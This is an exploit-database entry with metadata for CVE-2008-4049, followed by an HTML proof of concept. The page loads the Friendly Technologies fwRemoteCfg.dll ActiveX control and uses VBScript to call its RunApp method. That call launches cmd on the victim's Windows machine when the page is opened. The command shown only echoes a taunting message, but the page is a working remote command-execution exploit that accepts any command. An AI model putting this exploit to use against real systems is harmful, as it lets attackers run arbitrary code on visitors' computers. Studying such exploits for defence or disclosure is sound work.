Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Command Execution
Author: spdr
type: remote
platform: windows
port:
date_added: 2008-08-27
date_updated:
verified: 1
codes: OSVDB-48105;CVE-2008-4049
tags:
aliases:
screenshot_url:
application_url:
<!--
In addition to the overflow found in the "Friendly Technologies" dialers ActiveX,
Here is a "remote command execution" exploit.
Its so sad people dont actually Think...
Greetz to Binaryvision
======================
- http://www.binaryvision.org.il/
-- irc.nix.co.il/#binaryvision
--- written by spdr.
-->
<html>
<object classid='clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B' id='lamers' ></object>
<script language='vbscript'>
lamers.RunApp "cmd" ,"cmd /k echo So Simple, So Lame -- Somebody should get fired." ,0
</script>
# milw0rm.com [2008-08-28]